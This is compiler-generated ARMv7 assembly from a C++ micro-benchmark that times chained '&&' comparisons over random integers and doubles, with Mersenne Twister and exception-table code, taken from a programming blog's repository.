mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_18:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_21
@ BB#19:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_20:
.Ltmp2:
mov r5, r0
.LBB0_21: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#22:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_andand.cpp,%function
_GLOBAL__sub_I_andand.cpp: @ @_GLOBAL__sub_I_andand.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_andand.cpp, .Ltmp17-_GLOBAL__sub_I_andand.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_andand.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 15,020
|
exp/cpp_and_and/ARMv7/s/andand_double.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "andand_double.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #8192
movt r8, #1953
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
vmov s0, r0
add r0, r4, r5
add r5, r5, #8
vcvt.f64.s32 d16, s0
cmp r5, r8
vstr d16, [r0]
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
vmov.f64 d16, #1.000000e+00
movw r0, #8168
movt r0, #1953
.LBB0_6: @ =>This Inner Loop Header: Depth=1
add r1, r4, r5
vldr d17, [r1]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
vldr d17, [r1, #8]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
vldr d17, [r1, #16]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#9: @ in Loop: Header=BB0_6 Depth=1
vldr d17, [r1, #24]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_10: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #8
cmp r5, r0
bne .LBB0_6
@ BB#11:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#12:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#13: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#14: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#15: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#16: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_18
@ BB#17:
mov r0, r4
bl _ZdlPv
.LBB0_18: @ %_ZNSt6vectorIdSaIdEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_19:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_22
@ BB#20:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_21:
.Ltmp2:
mov r5, r0
.LBB0_22: @ %_ZNSt6vectorIdSaIdEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#23:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_andand_double.cpp,%function
_GLOBAL__sub_I_andand_double.cpp: @ @_GLOBAL__sub_I_andand_double.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_andand_double.cpp, .Ltmp17-_GLOBAL__sub_I_andand_double.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_andand_double.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 7,496
|
